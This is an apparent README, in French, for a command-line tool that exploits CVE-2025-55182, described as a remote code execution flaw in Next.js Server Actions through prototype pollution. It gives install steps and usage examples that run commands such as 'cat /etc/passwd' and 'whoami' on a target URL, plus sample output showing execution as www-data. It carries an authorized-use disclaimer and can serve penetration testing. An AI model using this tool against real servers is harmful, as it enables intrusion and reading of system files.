
CVE-2025-55182 Next.js RCE Exploit Tool
[!CAUTION]
⚠️ AVERTISSEMENT - LIRE AVANT UTILISATION
Cet outil est destiné UNIQUEMENT à :
- Chercheurs en sécurité effectuant une vérification de vulnérabilité
- Tests de pénétration autorisés avec permission explicite
- Fins éducatives et d'apprentissage
L'accès non autorisé à des systèmes informatiques est ILLEGAL.
En utilisant cet outil, vous acceptez que :
- Vous ayez obtenu une autorisation appropriée avant de tester tout système
- Vous n'utiliserez pas cet outil à des fins malveillantes
- Vous êtes seul responsable de vos actions et de leurs conséquences
L'auteur décline toute responsabilité en cas d'utilisation abusive de cet outil.
Un outil d'exploitation d'exécution de code à distance (RCE) pour la vulnérabilité de pollution de prototype côté serveur de Next.js.
CVE-2025-55182 est une vulnérabilité de sécurité critique affectant Next.js qui permet à des attaquants d'exécuter du code à distance via des requêtes conçues exploitant la pollution de prototype.
📖 Pour une analyse technique détaillée, voir EXPLOIT.md
Cette vulnérabilité exploite le mécanisme de gestion des requêtes Server Actions de Next.js, réalisant une exécution de code arbitraire via la pollution de la chaîne de prototypes __proto__ combinée au constructeur Function.
# Using yarn
yarn install
# Using npm
npm install
# Basic usage
node index.js <target_url> [command]
# Examples
node index.js http://localhost:3000
node index.js http://localhost:3000 "ls -la"
node index.js http://localhost:3000 "cat /etc/passwd"
# Run the tool
yarn start http://localhost:3000 "whoami"
# Or use alias
yarn exploit http://localhost:3000 "ls -la"
# Show help
yarn help
# Link globally
yarn link
# or
npm link
# Then use the command directly
cve-2025-55182 http://localhost:3000
cve-2025-55182 http://localhost:3000 "whoami"
# Unlink
yarn unlink
Utilisation :
cve-2025-55182 <url> [command]
Arguments :
url URL cible (obligatoire)
command Commande à exécuter (par défaut : whoami)
Options :
-h, --help Afficher le message d'aide
-v, --version Afficher le numéro de version
L'outil produit des résultats au format JSON :
{
"success": true,
"message": "",
"data": "command execution result"
}
{
"success": false,
"message": "error message",
"data": null
}
$ cve-2025-55182 http://vulnerable-site.com "id"
{
"success": true,
"message": "",
"data": "uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)"
}